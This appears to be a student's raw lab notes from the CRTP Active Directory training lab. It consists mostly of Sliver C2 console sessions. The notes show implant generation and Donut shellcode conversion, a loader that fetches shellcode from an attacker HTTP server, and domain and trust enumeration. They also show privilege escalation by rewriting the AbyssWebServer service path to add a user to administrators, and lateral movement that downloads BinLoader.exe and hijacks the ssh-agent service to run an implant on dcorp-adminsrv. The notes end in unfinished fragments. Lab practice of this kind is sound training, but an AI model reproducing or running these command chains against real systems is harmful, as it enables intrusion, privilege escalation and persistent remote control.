CRTP SLIVER
on client machine rdp’ed in
C:\Windows\system32>cd c:\ad\tools\sliver c:\AD\Tools\Sliver>binloader 172.16.99.98 8080 std98mtls.bin [+] Getting shellcode [+] Allocating memory [+] Executing... [+] Check for session!
serve bin file
generated with
[server] sliver (std98mtls) > generate --mtls 172.16.99.98 --os windows --arch amd64 --format exe -G --skip-symbols -N std98_mtls -s ./Implants/std98_mtls.exe
and donutted with
┌──(puck㉿kali)-[~/donut_v0.9.3]
└─$ ./donut std98mtls.exe
[ Donut shellcode generator v0.9.3
[ Copyright (c) 2019 TheWover, Odzhan
[ Instance type : Embedded
[ Module file : "std98mtls.exe"
[ Entropy : Random names + Encryption
[ File type : EXE
[ Target CPU : x86+amd64
[ AMSI/WDLP : continue
[ Shellcode : "loader.bin"
┌──(puck㉿kali)-[~/donut_v0.9.3]
└─$ mv loader.bin std98mtls.bin
.
┌──(puck㉿kali)-[~/CRTP/Sliver/Implants] └─$ python3 -m http.server 8080 Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ... 172.16.100.98 - - [11/Dec/2025 08:04:01] "GET /std98mtls.bin HTTP/1.1" 200 -
.
start sliver
┌──(puck㉿kali)-[~/CRTP/Sliver] └─$ ./sliver-server [*] Loaded 22 aliases from disk [*] Loaded 152 extension(s) from disk .------..------..------..------..------..------. |S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. | | :/\: || :/\: || (\/) || :(): || (\/) || :(): | | :\/: || (__) || :\/: || ()() || :\/: || ()() | | '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R| `------'`------'`------'`------'`------'`------' All hackers gain deathtouch [*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df - Dirty [*] Welcome to the sliver shell, please type 'help' for options [*] Check for updates with the 'update' command [server] sliver > mtls [*] Starting mTLS listener ... [*] Successfully started job #1 [server] sliver > https [*] Starting HTTPS :443 listener ... [*] Successfully started job #2 [server] sliver > sessions [*] No sessions 🙁 [*] Session e23550fd std98mtls - 172.16.100.98:50675 (dcorp-std98) - windows/amd64 - Thu, 11 Dec 2025 13:44:42 CET [*] Session e43416e3 std98mtls - 172.16.100.98:50676 (dcorp-std98) - windows/amd64 - Thu, 11 Dec 2025 13:44:42 CET [*] Session de5da6bb std98mtls - 172.16.100.98:50677 (dcorp-std98) - windows/amd64 - Thu, 11 Dec 2025 13:44:46 CET [server] sliver > use e23550fd-f5ef-4d94-a2d0-7c0283260a51 [*] Active session std98mtls (e23550fd-f5ef-4d94-a2d0-7c0283260a51) [server] sliver (std98mtls) > whoami Logon ID: dcorp\student98 [*] Current Token ID: dcorp\student98 [server] sliver (std98mtls) >
commands
Twitter: @tomcarver_
GitHub: @tomcarver16
[*] No domain supplied. This PC's domain will be used instead
[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 1
[+] gplink : [LDAP://cn={0BF8D01C-1F62-4BDC-958C-57140B67D147},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/ADSearch.exe '--search "(&(objectCategory=groupPolicyContainer)(|(name={0BF8D01C-1F62-4BDC-958C-57140B67D147})))" --attributes displayname'
[*] Output:
___ ____ _____ __
/ | / __ \/ ___/___ ____ ___________/ /_
/ /| | / / / /\__ \/ _ \/ __ `/ ___/ ___/ __ \
/ ___ |/ /_/ /___/ / __/ /_/ / / / /__/ / / /
/_/ |_/_____//____/\___/\__,_/_/ \___/_/ /_/
Twitter: @tomcarver_
GitHub: @tomcarver16
[*] No domain supplied. This PC's domain will be used instead
[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 1
[+] displayname : DevOps Policy
[server] sliver (std98mtls) >
LO4
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/dsquery.exe '* "CN=Partitions,CN=Configuration,DC=moneycorp,DC=local" -filter "(nETBIOSName=*)" -attr ncname'
[*] Output:
Records Found: 3
ncname
DC=dollarcorp,DC=moneycorp,DC=local
DC=moneycorp,DC=local
DC=us,DC=dollarcorp,DC=moneycorp,DC=local
DONE
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/ADSearch.exe '-d dollarcorp.moneycorp.local --search "(objectClass=trustedDomain)" --attributes cn,flatName,name,objectClass,trustAttributes,trustDirection,trustPartner --json'
[*] Output:
___ ____ _____ __
/ | / __ \/ ___/___ ____ ___________/ /_
/ /| | / / / /\__ \/ _ \/ __ `/ ___/ ___/ __ \
/ ___ |/ /_/ /___/ / __/ /_/ / / / /__/ / / /
/_/ |_/_____//____/\___/\__,_/_/ \___/_/ /_/
Twitter: @tomcarver_
GitHub: @tomcarver16
[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 3
[
{
"cn": "moneycorp.local",
"flatName": "mcorp",
"name": "moneycorp.local",
"objectClass": [
"top",
"leaf",
"trustedDomain"
],
"trustAttributes": 32,
"trustDirection": 3,
"trustPartner": "moneycorp.local"
},
{
"cn": "us.dollarcorp.moneycorp.local",
"flatName": "US",
"name": "us.dollarcorp.moneycorp.local",
"objectClass": [
"top",
"leaf",
"trustedDomain"
],
"trustAttributes": 32,
"trustDirection": 3,
"trustPartner": "us.dollarcorp.moneycorp.local"
},
{
"cn": "eurocorp.local",
"flatName": "ecorp",
"name": "eurocorp.local",
"objectClass": [
"top",
"leaf",
"trustedDomain"
],
"trustAttributes": 4,
"trustDirection": 3,
"trustPartner": "eurocorp.local"
}
]
[server] sliver (std98mtls) >
LO5
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/SharpUp.exe 'audit'
[*] Output:
=== SharpUp: Running Privilege Escalation Checks ===
[*] In medium integrity but user is a local administrator- UAC can be bypassed.
[*] Audit mode: running an additional 15 check(s).
[!] Modifialbe scheduled tasks were not evaluated due to permissions.
=== Modifiable Services ===
Service 'AbyssWebServer' (State: Stopped, StartMode: Auto)
[X] Exception: Exception has been thrown by the target of an invocation.
[X] Exception: Exception has been thrown by the target of an invocation.
[X] Exception: Exception has been thrown by the target of an invocation.
[X] Exception: Exception has been thrown by the target of an invocation.
Service 'SNMPTRAP' (State: Running, StartMode: Auto)
[*] Completed Privesc Checks in 19 seconds
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/Seatbelt.exe '-group=System'
<snip>
====== Services ======
Non Microsoft Services (via WMI)
????????????????????????????????????????? : ssh-agent
????????????????????????????????????????? : OpenSSH Authentication Agent
????????????????????????????????????????? : Agent to hold private keys used for public key authentication.
????????????????????????????????????????? : LocalSystem
????????????????????????????????????????? : Stopped
????????????????????????????????????????? : Disabled
????????????????????????????????????????? : Own Process
????????????????????????????????????????? : C:\Windows\System32\OpenSSH\ssh-agent.exe
????????????????????????????????????????? : C:\Windows\System32\OpenSSH\ssh-agent.exe
????????????????????????????????????????? : O:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464D:PAI(A;;0x1200a9;;;SY)(A;;0x1200a9;;;BA)(A;;0x1200a9;;;BU)(A;;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;;0x1200a9;;;AC)(A;;0x1200a9;;;S-1-15-2-2)
????????????????????????????????????????? :
????????????????????????????????????????? : O:SYD:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;RP;;;AU)
<snip>
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/Stracciatella.exe '-c "icacls abyssws.exe"'
[*] Output:
abyssws.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/Stracciatella.exe '-c "icacls c:\webserver"'
[*] Output:
c:\webserver NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > remote-sc-config -t 100 "" 'AbyssWebServer' 'C:\windows\system32\net.exe localgroup administrators dcorp\student98 /add ' 1 2
[*] Successfully executed remote-sc-config (coff-loader)
[*] Got output:
config_service:
hostname:
servicename: AbyssWebServer
binpath: C:\windows\system32\net.exe localgroup administrators dcorp\student98 /add
ignoremode: 1
startmode: 2
SUCCESS.
[server] sliver (std98mtls) > remote-sc-stop -t 100 "" 'AbyssWebServer'
[*] Successfully executed remote-sc-stop (coff-loader)
[*] Got output:
stop_service:
hostname:
servicename: AbyssWebServer
Service is already stopped.
SUCCESS.
[server] sliver (std98mtls) > remote-sc-start -t 100 "" 'AbyssWebServer'
[*] Successfully executed remote-sc-start (coff-loader)
[*] Got output:
start_service failed: 41D
start_service:
hostname:
servicename: AbyssWebServer
StartServiceA failed (41D)
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/LACheck.exe 'winrm /ldap:servers-exclude-dc /threads:10 /domain:dollarcorp.moneycorp.local'
[*] Output:
[+] Parsed Aguments:
rpc: False
smb: False
winrm: True
/bloodhound: False
/dc:
/domain: dollarcorp.moneycorp.local
/edr: False
/logons: False
/registry: False
/services: False
/ldap: servers-exclude-dc
/ou:
/socket:
/targets:
/threads: 10
/user: student98@dollarcorp.moneycorp.local
/verbose: False
[+] Performing LDAP query against dollarcorp.moneycorp.local for all enabled servers excluding Domain Controllers or read-only DCs...
[+] This may take some time depending on the size of the environment
[+] LDAP Search Results: 26
Status: (0.00%) 0 computers finished (+0) -- Using 25 MB RAM
[WinRM] Admin Success: DCORP-ADMINSRV.DOLLARCORP.MONEYCORP.LOCAL as student98@dollarcorp.moneycorp.local
[+] Finished enumerating hosts
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/CIMplant.exe '-s dcorp-adminsrv -c basic_info'
[*] Output:
_____ _____ __ __ _ _
/ ____|_ _| \/ | | | | |
| | | | | \ / |_ __ | | __ _ _ __ | |_
| | | | | |\/| | '_ \| |/ _` | '_ \| __|
| |____ _| |_| | | | |_) | | (_| | | | | |_
\_____|_____|_| |_| .__/|_|\__,_|_| |_|\__|
| |
by @Matt_Grandy_ |_| (@FortyNorthSec)
[+] Connecting to remote CIM instance using student98...
[+] Connected
[+] Results from basic_info:
Computer Name : DCORP-ADMINSRV
Windows Directory : C:\Windows
Operating System : Microsoft Windows Server 2022 Datacenter
Version : 10.0.20348
Manufacturer : Microsoft Corporation
Number of Users : 7
Registered User : Windows User
[+] Successfully completed basic_info command
Execution time: 0 Seconds
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/CIMplant.exe '-s dcorp-adminsrv -c command_exec --execute "$ExecutionContext.SessionState.LanguageMode"'
[*] Output:
_____ _____ __ __ _ _
/ ____|_ _| \/ | | | | |
| | | | | \ / |_ __ | | __ _ _ __ | |_
| | | | | |\/| | '_ \| |/ _` | '_ \| __|
| |____ _| |_| | | | |_) | | (_| | | | | |_
\_____|_____|_| |_| .__/|_|\__,_|_| |_|\__|
| |
by @Matt_Grandy_ |_| (@FortyNorthSec)
[+] Connecting to remote CIM instance using student98...
[+] Connected
[+] Results from command_exec:
[+] Executing command: $ExecutionContext.SessionState.LanguageMode
--------------------------------------------------------
ConstrainedLanguage
[+] Successfully completed command_exec command
Execution time: 7 Seconds
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute-assembly -p explorer.exe -t 80 /home/puck/CRTP/Sliver/CIMplant.exe '-s dcorp-adminsrv -c command_exec --execute "Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse"'
[*] Output:
_____ _____ __ __ _ _
/ ____|_ _| \/ | | | | |
| | | | | \ / |_ __ | | __ _ _ __ | |_
| | | | | |\/| | '_ \| |/ _` | '_ \| __|
| |____ _| |_| | | | |_) | | (_| | | | | |_
\_____|_____|_| |_| .__/|_|\__,_|_| |_|\__|
| |
by @Matt_Grandy_ |_| (@FortyNorthSec)
[+] Connecting to remote CIM instance using student98...
[+] Connected
[+] Results from command_exec:
[+] Executing command: Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
--------------------------------------------------------
Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2
Name Property
---- --------
Appx AllowWindows : 0
Dll AllowWindows : 0
Exe AllowWindows : 0
Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe
Name Property
---- --------
38a711c4-c0b8-46ee-98cf-c96363 Value : <FilePublisherRule Id="38a711c4-c0b8-46ee-98cf-c9636366548e" Name="Signed by
66548e O=MICROSOFT CORPORATION,
L=REDMOND, S=WASHINGTON, C=US" Description="" UserOrGroupSid="S-1-1-0"
Action="Allow"><Conditions><FilePublisherCondition PublisherName="O=MICROSOFT
CORPORATION, L=REDMOND,
S=WASHINGTON, C=US" ProductName="*" BinaryName="*"><BinaryVersionRange
LowSection="*"
HighSection="*"/></FilePublisherCondition></Conditions></FilePublisherRule>
Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2
Name Property
---- --------
Msi AllowWindows : 0
Script AllowWindows : 0
Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Script
Name Property
---- --------
06dce67b-934c-454f-a263-2515c8 Value : <FilePathRule Id="06dce67b-934c-454f-a263-2515c8796a5d" Name="(Default Rule) All
796a5d scripts located in the Program
Files folder" Description="Allows members of the Everyone group to run scripts
that are located in the Program
Files folder." UserOrGroupSid="S-1-1-0"
Action="Allow"><Conditions><FilePathCondition
Path="%PROGRAMFILES%\*"/></Conditions></FilePathRule>
8a64fa2c-8c17-415a-8505-44fc7d Value : <FilePublisherRule Id="8a64fa2c-8c17-415a-8505-44fc7d7810ad" Name="Signed by
7810ad O=MICROSOFT CORPORATION,
L=REDMOND, S=WASHINGTON, C=US" Description="" UserOrGroupSid="S-1-1-0"
Action="Allow"><Conditions><FilePublisherCondition PublisherName="O=MICROSOFT
CORPORATION, L=REDMOND,
S=WASHINGTON, C=US" ProductName="*" BinaryName="*"><BinaryVersionRange
LowSection="*"
HighSection="*"/></FilePublisherCondition></Conditions></FilePublisherRule>
9428c672-5fc3-47f4-808a-a0011f Value : <FilePathRule Id="9428c672-5fc3-47f4-808a-a0011f36dd2c" Name="(Default Rule) All
36dd2c scripts located in the Windows
folder" Description="Allows members of the Everyone group to run scripts that
are located in the Windows
folder." UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions><FilePathCondition
Path="%WINDIR%\*"/></Conditions></FilePathRule>
[+] Successfully completed command_exec command
Execution time: 3 Seconds
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > execute -o -S -t 180 winrs -r:dcorp-adminsrv 'set username & set computername'
[*] Output:
USERNAME=student98
COMPUTERNAME=DCORP-ADMINSRV
[!] Exited with status 6!
[server] sliver (std98mtls) >
[server] sliver (std98mtls) > ifconfig
+-------------------------------------------+
| Ethernet 9 |
+-------------------------------------------+
| # | IP Addresses | MAC Address |
+----+------------------+-------------------+
| 17 | 172.16.100.98/24 | 00:15:5d:fd:78:38 |
+-------------------------------------------+
1 adapters not shown.
[server] sliver (std98mtls) > pivots tcp --lport 8081
[*] Started tcp pivot listener :8081 with id 1
[server] sliver (std98mtls) > execute -o -S -t 180 winrs -r:dcorp-adminsrv 'hostname'
[*] Output:
dcorp-adminsrv
[!] Exited with status 6!
[server] sliver (std98mtls) >
on rdp session WSL start python3 -m http.server 80
wsluser@dcorp-std98:/mnt/c/AD/Tools/Sliver$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
172.16.4.101 - - [11/Dec/2025 03:38:31] "GET /BinLoader.exe HTTP/1.1" 200 -
^[[A172.16.4.101 - - [11/Dec/2025 03:39:26] "GET /BinLoader.exe HTTP/1.1" 200 -
[server] sliver (std98mtls) > execute -o -S -t 180 winrs -r:dcorp-adminsrv 'curl --output C:\windows\temp\BinLoader.exe --url http://172.16.100.98:8080/BinLoader.exe'
[*] Output:
[!] Exited with status 6!
[server] sliver (std98mtls) > execute -o -S -t 180 winrs -r:dcorp-adminsrv 'dir c:\windows\temp'
[*] Output:
Volume in drive C has no label.
Volume Serial Number is 76D3-EB93
Directory of c:\windows\temp
12/11/2025 03:38 AM <DIR> .
10/25/2024 02:37 AM <DIR> ..
11/11/2022 12:53 AM <DIR> 03ECEA13-6170-4E27-B206-1F40AA2E258E
12/11/2025 03:39 AM 5,120 BinLoader.exe
[server] sliver (std98mtls) > sa-sc-enum dcorp-adminsrv
[server] sliver (std98mtls) > remote-sc-stop -t 100 "dcorp-adminsrv" 'ssh-agent'
[server] sliver (std98mtls) > cd 'c:\ad\tools\sliver'
[server] sliver (std98mtls) > upload Implants\\dcorp-adminsrv_tcp.bin
[*] Wrote file to c:\ad\tools\sliver\Implants\dcorp-adminsrv_tcp.bin
[server] sliver (std98mtls) > scshell -t 80 dcorp-adminsrv ssh-agent 'C:\Windows\System32\cmd.exe /c start /b C:\Windows\Temp\BinLoader.exe 172.16.100.98 8080 dcorp-adminsrv_tcp.bin'
[*] Successfully executed scshell (coff-loader)
[*] Got output:
Trying to connect to dcorp-adminsrv
SC_HANDLE Manager 0x0000000010fab340
Opening ssh-agent
SC_HANDLE Service 0x0000000010fab220
LPQUERY_SERVICE_CONFIGA need 0x0000014c bytes
Original service binary path "C:\Windows\System32\OpenSSH\ssh-agent.exe"
Service path was changed to "C:\Windows\System32\cmd.exe /c start /b C:\Windows\Temp\BinLoader.exe 172.16.100.98 8080 dcorp-adminsrv_tcp.bin"
Service was started
Service path was restored to "C:\Windows\System32\OpenSSH\ssh-agent.exe"
[server] sliver (std98mtls) >
not working from kali next jenkins
LO6